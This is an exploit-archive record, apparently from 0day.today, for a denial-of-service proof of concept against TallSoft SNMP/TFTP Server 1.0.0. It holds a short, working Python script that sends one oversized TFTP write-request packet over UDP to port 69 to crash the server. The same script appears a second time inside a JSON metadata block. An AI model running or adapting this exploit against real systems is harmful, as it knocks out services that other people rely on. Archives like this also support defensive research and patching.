TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service
2016-03-28T00:00:00
ID 1337DAY-ID-25902 Type zdt Reporter Charley Celice Modified 2016-03-28T00:00:00
Description
Exploit for windows platform in category dos / poc
# Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS
# Date: 28-03-2016
# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS
#
# Category: Denial of Service
# Tested on: Windows XP SP3 English
# Details: Remotely crash TallSoft SNMP TFTP Server
from socket import *
import sys, select
address = ('127.0.0.1', 69)
# sufficient for the crash to work
crash = "\x00\x02\x00"
crash += "\x41"*1019
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(crash, address)
# 0day.today [2018-01-09] #
{"sourceData": "# Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS\r\n# Date: 28-03-2016\r\n# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe\r\n# Exploit Author: Charley Celice (stmerry)\r\n# Contact: https://twitter.com/charleycelice\r\n#\r\n# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS\r\n#\r\n# Category: Denial of Service\r\n# Tested on: Windows XP SP3 English\r\n# Details: Remotely crash TallSoft SNMP TFTP Server\r\n \r\nfrom socket import *\r\nimport sys, select\r\n \r\naddress = ('127.0.0.1', 69)\r\n \r\n# sufficient for the crash to work\r\ncrash = \"\\x00\\x02\\x00\"\r\ncrash += \"\\x41\"*1019\r\n \r\nserver_socket = socket(AF_INET, SOCK_DGRAM)\r\nserver_socket.sendto(crash, address)\n\n# 0day.today [2018-01-09] #", "description": "Exploit for windows platform in category dos / poc", "sourceHref": "https://0day.today/exploit/25902", "reporter": "Charley Celice", "href": "https://0day.today/exploit/description/25902", "type": "zdt", "viewCount": 6, "references": [], "lastseen": "2018-01-09T17:30:47", "published": "2016-03-28T00:00:00", "cvelist": [], "id": "1337DAY-ID-25902", "modified": "2016-03-28T00:00:00", "title": "TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.6, "vector": "NONE", "modified": "2018-01-09T17:30:47", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25902", "SECURITYVULNS:VULN:11494"]}, {"type": "zdt", "idList": ["1337DAY-ID-11494"]}], "modified": "2018-01-09T17:30:47", "rev": 2}, "vulnersScore": -0.6}}